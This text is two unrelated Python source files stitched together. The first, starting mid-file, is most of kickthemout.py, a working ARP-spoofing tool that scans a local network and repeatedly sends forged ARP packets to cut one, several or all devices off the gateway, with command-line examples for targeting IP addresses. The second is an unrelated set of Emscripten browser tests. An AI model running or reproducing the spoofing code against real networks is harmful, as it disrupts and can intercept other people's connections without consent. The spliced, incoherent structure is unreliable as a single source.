print("Known gateway IP: " + defaultGatewayIP)
except:
print("Failed to print defaultGatewayIP...")
try:
print("Crash trace: ")
print(traceback.format_exc())
except:
print("Failed to print crash trace...")
print("DEBUG FINISHED.\nShutting down...")
print("{}".format(END))
os._exit(1)
# make sure there is an internet connection
def checkInternetConnection():
try:
urlopen('https://google.com', timeout=3)
return True
except urllib.URLError as err:
return False
except KeyboardInterrupt:
shutdown()
# retrieve network interface
def getDefaultInterface(returnNet=False):
def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
def to_CIDR_notation(bytes_network, bytes_netmask):
network = scapy.utils.ltoa(bytes_network)
netmask = long2net(bytes_netmask)
net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
return net
iface_routes = [route for route in scapy.config.conf.route.routes if route[3] == scapy.config.conf.iface and route[1] != 0xFFFFFFFF]
network, netmask, _, interface, address = max(iface_routes, key=lambda item:item[1])
net = to_CIDR_notation(network, netmask)
if net:
if returnNet:
return net
else:
return interface
# retrieve default interface MAC address
def getDefaultInterfaceMAC():
try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac:
print(
"\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(
RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
else:
return defaultInterfaceMac
except:
# request interface MAC address (after failed detection by scapy)
print("\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve gateway IP
def getGatewayIP():
global stopAnimation
try:
getGateway = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return getGateway.src
except:
# request gateway IP address (after failed detection by scapy)
stopAnimation = True
print("\n{}ERROR: Gateway IP could not be obtained. Please enter IP manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter Gateway IP {}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve host MAC address
def retrieveMACAddress(host):
try:
query = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=host)
ans, _ = srp(query, timeout=2, verbose=0)
for _, rcv in ans:
return rcv[Ether].src
break
except:
return False
# resolve mac address of each vendor
def resolveMac(mac):
try:
# send request to macvendors.co
url = "http://macvendors.co/api/vendorname/"
request = Request(url + mac, headers={'User-Agent': "API Browser"})
response = urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
vendor = vendor[:25]
return vendor
except KeyboardInterrupt:
shutdown()
except:
return "N/A"
# regenerate online IPs array & configure gateway
def regenOnlineIPs():
global onlineIPs, defaultGatewayMac, defaultGatewayMacSet
if not defaultGatewayMacSet:
defaultGatewayMac = ""
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
if not defaultGatewayMacSet:
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "":
# request gateway MAC address (after failed detection by scapy)
print("\n{}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ("{}kickthemout{}> {}Enter your gateway's MAC Address {}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = input(header)
defaultGatewayMacSet = True
# scan network
def scanNetwork():
global hostsList
try:
# call scanning function from scan.py
hostsList = scan.scanNetwork(getDefaultInterface(True))
except KeyboardInterrupt:
pass
except:
print("\n\n{}ERROR: Network scanning failed. Please check your requirements configuration.{}".format(RED, END))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
os._exit(1)
regenOnlineIPs()
# non-interactive attack
def nonInteractiveAttack():
print("\n{}nonInteractiveAttack{} activated...{}\n".format(RED, GREEN, END))
target = options.targets
print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target)))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Checking target status...',))
t.daemon = True
t.start()
try:
nm = nmap.PortScanner()
counter = 0
for host in target:
a = nm.scan(hosts=host, arguments='-sn')
if a['scan'] != {}:
for k, v in a['scan'].items():
if str(v['status']['state']) == 'up':
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
stopAnimation = True
sys.stdout.write("\033[K")
defaultGatewayIP = getGatewayIP()
defaultGatewayMac = retrieveMACAddress(defaultGatewayIP)
except KeyboardInterrupt:
shutdown()
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
try:
while True:
# broadcast malicious ARP packets
for i in target:
ipAddress = i
macAddress = retrieveMACAddress(ipAddress)
if macAddress == False:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress)
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
except KeyboardInterrupt:
# re-arp targets on KeyboardInterrupt exception
print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END))
reArp = 1
while reArp != 10:
# broadcast ARP packets with legitimate info to restore connection
for i in target:
ipAddress = i
try:
macAddress = retrieveMACAddress(ipAddress)
except:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress)
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.2)
print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END))
# kick one device
def kickoneoff():
os.system("clear||cls")
print("\n{}kickONEOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
vendor = resolveMac(mac)
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
canBreak = False
while not canBreak:
try:
choice = int(input("\nChoose a target: "))
oneTargetIP = onlineIPs[choice]
canBreak = True
except KeyboardInterrupt:
shutdown()
except:
print("\n{}ERROR: Please enter a number from the list!{}".format(RED, END))
# locate MAC of specified device
oneTargetMAC = ""
for host in hostsList:
if host[0] == oneTargetIP:
oneTargetMAC = host[1]
if oneTargetMAC == "":
print("\nIP address is not up. Please try again.")
return
print("\n{}Target: {}{}".format(GREEN, END, oneTargetIP))
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
try:
while True:
# broadcast malicious ARP packets
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, oneTargetIP, oneTargetMAC)
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
except KeyboardInterrupt:
# re-arp target on KeyboardInterrupt exception
print("\n{}Re-arping{} target...{}".format(RED, GREEN, END))
reArp = 1
while reArp != 10:
try:
# broadcast ARP packets with legitimate info to restore connection
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.2)
print("{}Re-arped{} target successfully.{}".format(RED, GREEN, END))
# kick multiple devices
def kicksomeoff():
os.system("clear||cls")
print("\n{}kickSOMEOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
vendor = resolveMac(mac)
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
canBreak = False
while not canBreak:
try:
choice = input("\nChoose devices to target (comma-separated): ")
if ',' in choice:
someTargets = choice.split(",")
canBreak = True
else:
print("\n{}ERROR: Please select more than 1 devices from the list.{}\n".format(RED, END))
except KeyboardInterrupt:
shutdown()
someIPList = ""
for i in someTargets:
try:
someIPList += onlineIPs[int(i)] + ", "
except KeyboardInterrupt:
shutdown()
except:
print("\n{}ERROR: '{}{}{}' is not in the list.{}\n".format(RED, GREEN, i, RED, END))
return
someIPList = someIPList[:-2] + END
print("\n{}Targets: {}{}".format(GREEN, END, someIPList))
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
try:
while True:
# broadcast malicious ARP packets
for i in someTargets:
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
except KeyboardInterrupt:
# re-arp targets on KeyboardInterrupt exception
print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END))
reArp = 1
while reArp != 10:
# broadcast ARP packets with legitimate info to restore connection
for i in someTargets:
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.2)
print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END))
# kick all devices
def kickalloff():
os.system("clear||cls")
print("\n{}kickALLOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("Target(s): ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
vendor = resolveMac(mac)
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
try:
# broadcast malicious ARP packets
reScan = 0
while True:
for host in hostsList:
if host[0] != defaultGatewayIP:
# dodge gateway (avoid crashing network itself)
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
reScan += 1
if reScan == 4:
reScan = 0
scanNetwork()
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
except KeyboardInterrupt:
print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END))
reArp = 1
while reArp != 10:
# broadcast ARP packets with legitimate info to restore connection
for host in hostsList:
if host[0] != defaultGatewayIP:
try:
# dodge gateway
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.2)
print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END))
# script's main function
def main():
# display heading
heading()
if interactive:
print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> {}{}{} hosts are up.{}".format(
GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, str(len(hostsList)), GREEN, END))
# display warning in case of no active hosts
if len(hostsList) == 0 or len(hostsList) == 1:
if len(hostsList) == 1:
if hostsList[0][0] == defaultGatewayIP:
print("\n{}{}WARNING: There are {}0 hosts up{} on you network except your gateway.\n\tYou can't kick anyone off {}:/{}\n".format(
GREEN, RED, GREEN, RED, GREEN, END))
os._exit(1)
else:
print(
"\n{}{}WARNING: There are {}0 hosts{} up on you network.\n\tIt looks like something went wrong {}:/{}".format(
GREEN, RED, GREEN, RED, GREEN, END))
print(
"\n{}If you are experiencing this error multiple times, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n{}".format(
RED, BLUE, END))
os._exit(1)
else:
print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> Target(s): '{}{}{}'.{}".format(
GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, ", ".join(options.targets), GREEN, END))
if options.targets is None and options.scan is False:
try:
while True:
optionBanner()
header = ('{}kickthemout{}> {}'.format(BLUE, WHITE, END))
choice = input(header)
if choice.upper() == 'E' or choice.upper() == 'EXIT':
shutdown()
elif choice == '1':
kickoneoff()
elif choice == '2':
kicksomeoff()
elif choice == '3':
kickalloff()
elif choice.upper() == 'CLEAR':
os.system("clear||cls")
else:
print("\n{}ERROR: Please select a valid option.{}\n".format(RED, END))
except KeyboardInterrupt:
shutdown()
elif options.scan is not False:
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("\nOnline IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
vendor = resolveMac(mac)
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
else:
nonInteractiveAttack()
if __name__ == '__main__':
# implement option parser
optparse.OptionParser.format_epilog = lambda self, formatter: self.epilog
version = '2.0'
examples = ('\nExamples:\n'+
' sudo python3 kickthemout.py --target 192.168.1.10 \n'+
' sudo python3 kickthemout.py -t 192.168.1.5,192.168.1.10 -p 30\n'+
' sudo python3 kickthemout.py -s\n'+
' sudo python3 kickthemout.py (interactive mode)\n')
parser = optparse.OptionParser(epilog=examples,
usage='sudo python3 %prog [options]',
prog='kickthemout.py', version=('KickThemOut ' + version))
parser.add_option('-p', '--packets', action='store',
dest='packets', help='number of packets broadcasted per minute (default: 6)')
parser.add_option('-s', '--scan', action='store_true', default=False,
dest='scan', help='perform a quick network scan and exit')
def targetList(option, opt, value, parser):
setattr(parser.values, option.dest, value.split(','))
parser.add_option('-t', '--target', action='callback',
callback=targetList, type='string',
dest='targets', help='specify target IP address(es) and perform attack')
(options, argv) = parser.parse_args()
try:
if checkInternetConnection():
pass
else:
print("\n{}ERROR: It seems that you are offline. Please check your internet connection.{}\n".format(RED, END))
os._exit(1)
except KeyboardInterrupt:
shutdown()
# configure appropriate network info
try:
defaultInterface = getDefaultInterface()
defaultGatewayIP = getGatewayIP()
defaultInterfaceMac = getDefaultInterfaceMAC()
global defaultGatewayMacSet
defaultGatewayMacSet = False
except KeyboardInterrupt:
shutdown()
if (options.packets is not None and (options.packets).isdigit()) or options.packets is None:
pass
else:
print("\n{}ERROR: Argument for number of packets broadcasted per minute must be an integer {}(e.g. {}--packet 60{}).\n".format(RED, END, BLUE, END))
os._exit(1)
if options.targets is None:
# set to interactive attack
interactive = True
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
else:
# set to non-interactive attack
interactive = False
main() |
test_browser.py | import BaseHTTPServer, multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root
from tools.shared import *
# User can specify an environment variable EMSCRIPTEN_BROWSER to force the browser test suite to
# run using another browser command line than the default system browser.
emscripten_browser = os.environ.get('EMSCRIPTEN_BROWSER')
if emscripten_browser:
cmd = shlex.split(emscripten_browser)
def run_in_other_browser(url):
Popen(cmd + [url])
webbrowser.open_new = run_in_other_browser
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum):
class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
expectedConns = 11
httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
class browser(BrowserCore):
@staticmethod
def audio():
print
print 'Running the browser audio tests. Make sure to listen to hear the correct results!'
print
audio_test_cases = [
'test_sdl_audio',
'test_sdl_audio_mix_channels',
'test_sdl_audio_mix',
'test_sdl_audio_quickload',
'test_sdl_audio_beeps',
'test_openal_playback',
'test_openal_buffers',
'test_freealut'
]
return unittest.TestSuite(map(browser, audio_test_cases))
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
print
print 'Running the browser tests. Make sure the browser allows popups from localhost.'
print
def test_html(self):
# test HTML generation.
self.btest('hello_world_sdl.cpp', reference='htmltest.png',
message='You should see "hello, world!" and a colored cube.')
def test_html_source_map(self):
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
time.sleep(1)
print '''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
'''
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_split(self):
# test HTML generation.
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something_functions.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
def test_split_in_source_filenames(self):
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '-g', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something', 'hello_world_sdl.cpp.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
def test_compression(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("hello compressed world\n");
int result = 1;
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'page.js')), 'must be side js'
assert os.path.exists(os.path.join(self.get_dir(), 'page.js.compress')), 'must be side compressed js'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size > os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be smaller'
shutil.move(os.path.join(self.get_dir(), 'page.js'), 'page.js.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
def make_main(path):
print 'make main at', path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print 'Testing', srcpath, dstpath
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
make_main('somefile.txt')
